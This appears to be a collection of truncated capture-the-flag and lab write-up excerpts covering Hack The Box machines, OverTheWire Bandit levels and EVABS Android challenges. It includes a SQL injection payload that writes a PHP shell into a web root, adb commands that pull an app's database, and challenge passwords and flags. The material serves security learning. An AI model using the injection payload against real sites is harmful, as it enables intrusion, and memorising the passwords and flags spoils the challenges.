How to improve our TTY

Once we get a reverse shell, we usually need to improve the TTY. Here are some tips to do it:

HTB Validation

$ nmap -p- -v 10.10.11.116

Access to http://10.10.11.116

The listbox values are sent to the server in a POST request:

username=rffuste&country=Brazil

In the response, we get a cookie user. This user cookie does not change if multiple requests are performed.

SQL Injection

We can check if there is an SQL Injection. We have confirmed there is an SQL Injection that we can use.

' union select "" INTO OUTFILE '/var/www/html/shell.php'– –

Now

Bandit CTF Level 16

Level 15 -> 16

bandit15@bandit:~$ echo "BfMYroe26WYalil77FoDi9qh59eK5xNr" | openssl s_client -connect localhost:30001 -ign_eof

password = cluFXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 15

Level 14 -> 15

bandit14@bandit:~$ echo "4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e" | nc localhost 30000

password = BfMYXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 14

Level 13 -> 14

bandit13@bandit:~$ ssh bandit14@localhost -i sshkey.private
bandit14@bandit:~$ cd /etc/bandit_pass/
bandit14@bandit:/etc/bandit_pass$ cat bandit14

Password = 4wcYXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 13

Level 12 -> 13

bandit12@bandit:~$ ls
bandit12@bandit:~$ mkdir /tmp/pepet
bandit12@bandit:~$ cp data.txt /tmp/pepet
bandit12@bandit:~$ cd /tmp/pepet
bandit12@bandit:/tmp/pepet$ ls
bandit12@bandit:/tmp/pepet$ file data.txt
bandit12@bandit:/tmp/pepet$ xxd -r data.txt > data_xxd_1
bandit12@bandit:/tmp/pepet$ file data_xxd_1
bandit12@bandit:/tmp/pepet$ ls
bandit12@bandit:/tmp/pepet$ zcat data_xxd_1 > data_zcat_1
bandit12@bandit:/tmp/pepet$ file data_zcat_1
bandit12@bandit:/tmp/pepet$ bzip2 -d data_zcat_1
bandit12@bandit:/tmp/pepet$ file data_zcat_1.out
bandit12@bandit:/tmp/pepet$ zcat data_zcat_1.out > data_zcat_2
bandit12@bandit:/tmp/pepet$ ls
bandit12@bandit:/tmp/pepet$ file data_zcat_2
bandit12@bandit:/tmp/pepet$ tar xvf data_zcat_2
bandit12@bandit:/tmp/pepet$ file data5.bin
bandit12@bandit:/tmp/pepet$ tar xvf data5.bin
bandit12@bandit:/tmp/pepet$ file data6.bin
bandit12@bandit:/tmp/pepet$ ls
bandit12@bandit:/tmp/pepet$ bzip2 data6.bin.bz2

EVABS Challenge 8

EVABS{nev3r_st0re_s3ns!tiv3_data_1n_7h3_s0urcec0de}

HTB TheNotebook

$ nmap 10.10.10.230 -A -p- -T4 -v

http://10.10.10.230/

http://10.10.10.230/register

So, a user test exists. What would be the password? test??? Do we have an admin user?

http://10.10.10.230/login

We can try to log in with our test user.

Test notes

After logging in, we can observe that there is an AUTH Token. We observe that it is a JWT Token. We can decode it using https://jwt.io/

Here we can observe several things: RS256

EVABS Challenge 7

$ adb shell am start -n com.revo.evabs/com.revo.evabs.ExportedActivity

EVABS{exp0rted_activities_ar3_harmful}

EVABS Challenge 6

$ adb shell
vbox86p:/data/data/com.revo.evabs/databases # ls
$ adb pull /data/data/com.revo.evabs/databases/MAINFRAME_ACCESS .
$ ls
$ file MAINFRAME_ACCESS

EVABS{sqlite_is_not_safe}